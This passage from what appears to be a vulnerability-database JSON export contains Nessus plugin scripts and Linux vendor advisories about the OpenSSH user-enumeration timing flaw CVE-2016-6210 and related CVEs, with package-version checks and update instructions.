audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(2)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"openssh-6.6.1p1-28.h13\",\n \"openssh-askpass-6.6.1p1-28.h13\",\n \"openssh-clients-6.6.1p1-28.h13\",\n \"openssh-keycat-6.6.1p1-28.h13\",\n \"openssh-server-6.6.1p1-28.h13\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"2\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssh\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-06T13:24:16", "description": "The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - Fix for CVE-2016-6210: User enumeration via covert\n timing channel (#1357442)", "edition": 24, "cvss3": {"score": 5.9, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2017-09-01T00:00:00", "title": "OracleVM 3.3 / 3.4 : openssh (OVMSA-2017-0150)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6210"], "modified": "2017-09-01T00:00:00", "cpe": ["cpe:/o:oracle:vm_server:3.4", "cpe:/o:oracle:vm_server:3.3", "p-cpe:/a:oracle:vm:openssh-clients", "p-cpe:/a:oracle:vm:openssh", "p-cpe:/a:oracle:vm:openssh-server"], "id": "ORACLEVM_OVMSA-2017-0150.NASL", "href": "https://www.tenable.com/plugins/nessus/102908", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2017-0150.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(102908);\n script_version(\"3.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2016-6210\");\n\n script_name(english:\"OracleVM 3.3 / 3.4 : openssh (OVMSA-2017-0150)\");\n script_summary(english:\"Checks the RPM output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote OracleVM host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - Fix for CVE-2016-6210: User enumeration via covert\n timing channel (#1357442)\"\n );\n # https://oss.oracle.com/pipermail/oraclevm-errata/2017-August/000777.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?02191c63\"\n );\n # https://oss.oracle.com/pipermail/oraclevm-errata/2017-August/000778.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?7db061dc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected openssh / openssh-clients / openssh-server\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:openssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:openssh-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:openssh-server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/02/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/08/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! preg(pattern:\"^OVS\" + \"(3\\.3|3\\.4)\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 3.3 / 3.4\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"OVS3.3\", reference:\"openssh-5.3p1-123.el6_9\")) flag++;\nif (rpm_check(release:\"OVS3.3\", reference:\"openssh-clients-5.3p1-123.el6_9\")) flag++;\nif (rpm_check(release:\"OVS3.3\", reference:\"openssh-server-5.3p1-123.el6_9\")) flag++;\n\nif (rpm_check(release:\"OVS3.4\", reference:\"openssh-5.3p1-123.el6_9\")) flag++;\nif (rpm_check(release:\"OVS3.4\", reference:\"openssh-clients-5.3p1-123.el6_9\")) flag++;\nif (rpm_check(release:\"OVS3.4\", reference:\"openssh-server-5.3p1-123.el6_9\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssh / openssh-clients / openssh-server\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-12T09:49:43", "description": "Eddie Harari reported that the OpenSSH SSH daemon allows user\nenumeration through timing differences when trying to authenticate\nusers. When sshd tries to authenticate a non-existing user, it will\npick up a fixed fake password structure with a hash based on the\nBlowfish algorithm. If real users passwords are hashed using\nSHA256/SHA512, then a remote attacker can take advantage of this flaw\nby sending large passwords, receiving shorter response times from the\nserver for non-existing users.", "edition": 25, "cvss3": {"score": 5.9, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2016-07-25T00:00:00", "title": "Debian DSA-3626-1 : openssh - security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6210"], "modified": "2016-07-25T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:8.0", "p-cpe:/a:debian:debian_linux:openssh"], "id": "DEBIAN_DSA-3626.NASL", "href": "https://www.tenable.com/plugins/nessus/92526", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3626. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(92526);\n script_version(\"2.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-6210\");\n script_xref(name:\"DSA\", value:\"3626\");\n\n script_name(english:\"Debian DSA-3626-1 : openssh - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Eddie Harari reported that the OpenSSH SSH daemon allows user\nenumeration through timing differences when trying to authenticate\nusers. When sshd tries to authenticate a non-existing user, it will\npick up a fixed fake password structure with a hash based on the\nBlowfish algorithm. If real users passwords are hashed using\nSHA256/SHA512, then a remote attacker can take advantage of this flaw\nby sending large passwords, receiving shorter response times from the\nserver for non-existing users.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=831902\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/openssh\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2016/dsa-3626\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the openssh packages.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 1:6.7p1-5+deb8u3.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:openssh\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/07/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/07/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"openssh-client\", reference:\"1:6.7p1-5+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"openssh-client-udeb\", reference:\"1:6.7p1-5+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"openssh-server\", reference:\"1:6.7p1-5+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"openssh-server-udeb\", reference:\"1:6.7p1-5+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"openssh-sftp-server\", reference:\"1:6.7p1-5+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ssh\", reference:\"1:6.7p1-5+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ssh-askpass-gnome\", reference:\"1:6.7p1-5+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ssh-krb5\", reference:\"1:6.7p1-5+deb8u3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-07T14:24:41", "description": "This update for openssh fixes the following issues :\n\n - Prevent user enumeration through the timing of password\n processing (bsc#989363, CVE-2016-6210)\n [-prevent_timing_user_enumeration]\n\n - Allow lowering the DH groups parameter limit in server\n as well as when GSSAPI key exchange is used (bsc#948902)\n\n - limit accepted password length (prevents possible DoS)\n (bsc#992533, CVE-2016-6515) Bug fixes :\n\n - avoid complaining about unset DISPLAY variable\n (bsc#981654)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 28, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2016-09-13T00:00:00", "title": "SUSE SLED12 / SLES12 Security Update : openssh (SUSE-SU-2016:2280-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6515", "CVE-2016-6210"], "modified": "2016-09-13T00:00:00", "cpe": ["cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:openssh", "p-cpe:/a:novell:suse_linux:openssh-askpass-gnome", "p-cpe:/a:novell:suse_linux:openssh-askpass-gnome-debuginfo", "p-cpe:/a:novell:suse_linux:openssh-helpers-debuginfo", "p-cpe:/a:novell:suse_linux:openssh-helpers", "p-cpe:/a:novell:suse_linux:openssh-debuginfo", "p-cpe:/a:novell:suse_linux:openssh-fips", "p-cpe:/a:novell:suse_linux:openssh-debugsource"], "id": "SUSE_SU-2016-2280-1.NASL", "href": "https://www.tenable.com/plugins/nessus/93455", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2016:2280-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(93455);\n script_version(\"2.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2016-6210\", \"CVE-2016-6515\");\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : openssh (SUSE-SU-2016:2280-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for openssh fixes the following issues :\n\n - Prevent user enumeration through the timing of password\n processing (bsc#989363, CVE-2016-6210)\n [-prevent_timing_user_enumeration]\n\n - Allow lowering the DH groups parameter limit in server\n as well as when GSSAPI key exchange is used (bsc#948902)\n\n - limit accepted password length (prevents possible DoS)\n (bsc#992533, CVE-2016-6515) Bug fixes :\n\n - avoid complaining about unset DISPLAY variable\n (bsc#981654)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=948902\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=981654\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=989363\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=992533\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-6210/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-6515/\"\n );\n # https://www.suse.com/support/update/announcement/2016/suse-su-20162280-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b9954ae3\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server for SAP 12:zypper in -t patch\nSUSE-SLE-SAP-12-2016-1332=1\n\nSUSE Linux Enterprise Server 12-SP1:zypper in -t patch\nSUSE-SLE-SERVER-12-SP1-2016-1332=1\n\nSUSE Linux Enterprise Server 12-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-2016-1332=1\n\nSUSE Linux Enterprise Desktop 12-SP1:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP1-2016-1332=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-askpass-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-askpass-gnome-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-fips\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-helpers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-helpers-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/08/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/09/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/13\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(0|1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0/1\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"openssh-6.6p1-52.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"openssh-askpass-gnome-6.6p1-52.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"openssh-askpass-gnome-debuginfo-6.6p1-52.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"openssh-debuginfo-6.6p1-52.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"openssh-debugsource-6.6p1-52.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"openssh-fips-6.6p1-52.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"openssh-helpers-6.6p1-52.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"openssh-helpers-debuginfo-6.6p1-52.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"openssh-6.6p1-52.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"openssh-askpass-gnome-6.6p1-52.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"openssh-askpass-gnome-debuginfo-6.6p1-52.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"openssh-debuginfo-6.6p1-52.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"openssh-debugsource-6.6p1-52.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"openssh-fips-6.6p1-52.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"openssh-helpers-6.6p1-52.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"openssh-helpers-debuginfo-6.6p1-52.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"openssh-6.6p1-52.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"openssh-askpass-gnome-6.6p1-52.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"openssh-askpass-gnome-debuginfo-6.6p1-52.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"openssh-debuginfo-6.6p1-52.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"openssh-debugsource-6.6p1-52.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"openssh-helpers-6.6p1-52.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"openssh-helpers-debuginfo-6.6p1-52.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssh\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "centos": [{"lastseen": "2020-12-08T03:34:08", "bulletinFamily": "unix", "cvelist": ["CVE-2016-6210"], "description": "**CentOS Errata and Security Advisory** CESA-2017:2563\n\n\nOpenSSH is an SSH protocol implementation supported by a number of Linux, UNIX, and similar operating systems. It includes the core files necessary for both the OpenSSH client and server.\n\nSecurity Fix(es):\n\n* A covert timing channel flaw was found in the way OpenSSH handled authentication of non-existent users. A remote unauthenticated attacker could possibly use this flaw to determine valid user names by measuring the timing of server responses. (CVE-2016-6210)\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2017-August/034567.html\n\n**Affected packages:**\nopenssh\nopenssh-askpass\nopenssh-clients\nopenssh-ldap\nopenssh-server\npam_ssh_agent_auth\n\n**Upstream details at:**\n", "edition": 4, "modified": "2017-08-31T18:50:28", "published": "2017-08-31T18:50:28", "href": "http://lists.centos.org/pipermail/centos-announce/2017-August/034567.html", "id": "CESA-2017:2563", "title": "openssh, pam_ssh_agent_auth security update", "type": "centos", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-12-20T18:28:36", "bulletinFamily": "unix", "cvelist": ["CVE-2016-10708", "CVE-2016-10011", "CVE-2016-10009", "CVE-2016-6515", "CVE-2016-6210", "CVE-2016-10012"], "description": "**CentOS Errata and Security Advisory** CESA-2017:2029\n\n\nOpenSSH is an SSH protocol implementation supported by a number of Linux, UNIX, and similar operating systems. It includes the core files necessary for both the OpenSSH client and server.\n\nThe following packages have been upgraded to a later upstream version: openssh (7.4p1). (BZ#1341754)\n\nSecurity Fix(es):\n\n* A covert timing channel flaw was found in the way OpenSSH handled authentication of non-existent users. A remote unauthenticated attacker could possibly use this flaw to determine valid user names by measuring the timing of server responses. (CVE-2016-6210)\n\n* It was found that OpenSSH did not limit password lengths for password authentication. A remote unauthenticated attacker could use this flaw to temporarily trigger high CPU consumption in sshd by sending long passwords. (CVE-2016-6515)\n\n* It was found that ssh-agent could load PKCS#11 modules from arbitrary paths. An attacker having control of the forwarded agent-socket on the server, and the ability to write to the filesystem of the client host, could use this flaw to execute arbitrary code with the privileges of the user running ssh-agent. (CVE-2016-10009)\n\n* It was found that the host private key material could possibly leak to the privilege-separated child processes via re-allocated memory. An attacker able to compromise the privilege-separated process could therefore obtain the leaked key information. (CVE-2016-10011)\n\n* It was found that the boundary checks in the code implementing support for pre-authentication compression could have been optimized out by certain compilers. An attacker able to compromise the privilege-separated process could possibly use this flaw for further attacks against the privileged monitor process. (CVE-2016-10012)\n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Red Hat Enterprise Linux 7.4 Release Notes linked from the References section.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-cr-announce/2017-August/004417.html\n\n**Affected packages:**\nopenssh\nopenssh-askpass\nopenssh-cavs\nopenssh-clients\nopenssh-keycat\nopenssh-ldap\nopenssh-server\nopenssh-server-sysvinit\npam_ssh_agent_auth\n\n**Upstream details at:**\n", "edition": 6, "modified": "2017-08-24T01:40:16", "published": "2017-08-24T01:40:16", "href": "http://lists.centos.org/pipermail/centos-cr-announce/2017-August/004417.html", "id": "CESA-2017:2029", "title": "openssh, pam_ssh_agent_auth security update", "type": "centos", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:38:29", "bulletinFamily": "unix", "cvelist": ["CVE-2016-6210"], "description": "[5.3p1-123]\n- Fix for CVE-2016-6210: User enumeration via covert timing channel (#1357442)", "edition": 4, "modified": "2017-08-31T00:00:00", "published": "2017-08-31T00:00:00", "id": "ELSA-2017-2563", "href": "http://linux.oracle.com/errata/ELSA-2017-2563.html", "title": "openssh security update", "type": "oraclelinux", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-10-22T17:13:45", "bulletinFamily": "unix", "cvelist": ["CVE-2016-10011", "CVE-2016-10009", "CVE-2016-6515", "CVE-2016-6210", "CVE-2016-10012"], "description": "[7.4p1-11 + 0.10.3-1]\n- 